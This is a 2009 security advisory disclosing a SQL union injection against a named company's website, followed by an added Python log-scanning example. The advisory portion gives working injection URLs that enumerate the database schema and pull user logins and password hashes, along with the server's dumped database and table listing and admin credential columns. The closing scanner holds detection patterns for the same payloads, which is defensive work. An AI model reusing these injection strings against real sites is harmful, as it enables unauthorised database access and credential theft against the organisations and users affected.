
Rackspace SQL Injection

17 Aug 2009 00:00:00 | Reported by Rohit Bansal | Type: packetstorm | Source: packetstormsecurity.com

Rackspace SQL Injection vulnerability found by Rohit Bansal on 01-08-2009. Vulnerable to SQL Union Injection. Apache/2.0.52 (Red Hat), PHP/5.1.6, Current User: [email protected], Current Database: rscom, Supports Union: yes, Visible Column:

Code
`--------------------------------------------------------------------------------------------------------------------------  
[+] www.rackspace.com SQL Injection vulnerability  
[+] Found By: Rohit Bansal [ SCHAP Security http://schap.org ]  
[+] Date: 01-08-2009  
  
----------------------------------------------------------------------------------------------------------------------------  
  
  
http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat  
(table_schema,table_name),4%20FROM%20information_schema.tables%20--  
  
http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat  
(user_login,user_pass),4%20FROM%20rscom.wp_users%20--  
  
  
  
Host Information  
  
Server = Apache/2.0.52 (Red Hat)  
Version = 5.0.77-log  
Powered by = PHP/5.1.6  
Attack Type = SQL Union Injection  
Current User = [email protected]  
Current Database = rscom  
Supports Union = yes  
Union Columns = 4  
  
Url| http://www.rackspace.com/information/mediacenter/award.php?id=101  
  
Vuln:  
http://www.rackspace.com/information/mediacenter/award.php?id=101+and+1=0+Union  
Select 1 ,2, UNHEX(HEX([visible])) ,4  
  
Comment: --  
  
Visible Column: 3  
  
Database:rscom  
  
information_schema  
rscom  
rscom_dev  
test  
  
Tables:pp_admin  
jboss_auth  
jboss_users  
pp_admin  
pp_commission_type  
pp_contact  
pp_contact_email  
pp_contact_phone  
pp_contact_type  
pp_contract_type  
pp_employee  
pp_notes  
pp_partner  
pp_partner_auth  
pp_partner_exclusivity  
pp_partner_info  
pp_partner_referredcustomer  
pp_partner_service  
pp_phone_type  
pp_service_type  
pp_status_type  
pp_w9_type  
rackspace_agendas  
rackspace_agendas_data  
rackspace_agendas_data_types  
rackspace_agendas_notes  
rackspace_agendas_participants  
rackspace_bizspark  
rackspace_club  
rackspace_conference_attendees  
rackspace_conference_auth  
rackspace_copyrightnotices  
rackspace_customerbriefing  
rackspace_december8months  
rackspace_leaders  
rackspace_leaders_avatars  
rackspace_logorequests  
rackspace_loophole  
rackspace_me_calculator  
rackspace_newsarticles  
rackspace_partners  
rackspace_partners_questions  
rackspace_partners_questions_options  
rackspace_partners_reps  
rackspace_pressreleases  
rackspace_search  
rackspace_search_sidebar  
rackspace_settings  
rackspace_sitesubmissions  
rackspace_survey  
rackspace_survey_results  
rackspaceipo_auth  
rackspaceipo_content  
rackspaceipo_effectiveness_types  
rackspaceipo_fwprospectus  
rackspaceipo_notices  
rackspaceipo_prospectus  
rackspaceipo_status_types  
rackspacestore_accounts  
rackspacestore_agreements  
rackspacestore_options  
rackspacestore_options_dependants  
rackspacestore_options_types  
rackspacestore_options_values  
rackspacestore_orders  
rackspacestore_payments  
rackspacestore_payments_types  
rackspacestore_products  
rackspacestore_settings  
rackspacestore_shared_orders_options  
rackspacestore_shared_products_options  
rackspacestore_shared_products_specs  
rackspacestore_specs  
rackspacestore_specs_types  
rc_events  
rc_sitesubmissions  
ror_cities  
ror_followup  
ror_registrants  
ror_registrants_rackers  
vendor_auth  
vgb_baskets  
vgb_images  
wp_2_comments  
wp_2_comments_revver  
wp_2_links  
wp_2_options  
wp_2_postmeta  
wp_2_posts  
wp_2_posts_revver  
wp_2_term_relationships  
wp_2_term_taxonomy  
wp_2_terms  
wp_2_usermeta  
wp_2_users  
wp_auth  
wp_comments  
wp_comments_revver  
wp_links  
wp_options  
wp_postmeta  
wp_posts  
wp_posts_revver  
wp_term_relationships  
wp_term_taxonomy  
wp_terms  
wp_usermeta  
wp_users  
  
Columns: Table pp_admin  
admin_username  
admin_password  
  
  
--------------------------------------------------------------------------------------------------------------------------  
[+]^Rohit Bansal [[email protected]]  
[+] Schap.org, Infysec, Evilfinger  
-------------------------------------------------------------------------------------------------------------------------  
  
  
  
--   
"You only get smarter, by playing a smarter opponent !"  
`
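
For defenders, the request shapes in this advisory (a non-numeric `id`, mixed-case `uNion+Select`, `+` and `%20` used as spaces, a trailing `--`) can be hunted in web access logs. The sketch below is an added example, not part of the original advisory: the log lines are constructed, and the indicator names and function names are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators mirror the request shapes shown in the advisory.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "always_false": re.compile(r"\band\s+1\s*=\s*0\b"),
    "trailing_comment": re.compile(r"(?:--|#)\s*$"),
}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Lower-case, drop /* */ comments and collapse whitespace."""
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value.lower())).strip()

def inspect_id(query, param="id"):
    """Return indicator names for a raw query string; [] means a plain integer id."""
    hits = []
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        if re.fullmatch(r"\d{1,10}", value):
            continue  # the only shape a numeric record id should have
        hits.append("non_integer_id")
        norm = normalize(value)  # parse_qs already decoded '+' and %XX
        hits += [name for name, rx in INDICATORS.items() if rx.search(norm)]
    return hits

def scan(lines):
    """Return (line_number, indicators) for every flagged access-log line."""
    flagged = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = inspect_id(urlsplit(match.group(1)).query) if match else []
        if hits:
            flagged.append((number, hits))
    return flagged

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2009:10:00:00 +0000] "GET /information/mediacenter/award.php?id=101 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Aug/2009:10:00:05 +0000] "GET /information/mediacenter/award.php?id=101+and+1=0+Union+Select+1,2,3,4 HTTP/1.1" 200 4980',
    '198.51.100.7 - - [01/Aug/2009:10:00:09 +0000] "GET /information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat(table_schema,table_name),4%20FROM%20information_schema.tables%20-- HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, ", ".join(hits))
```

Matching only after URL-decoding and lower-casing is what makes the mixed-case keyword visible to the rules. The same integer allowlist, applied in the application before the value reaches a parameterized query, is the durable fix for a numeric `id` parameter.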
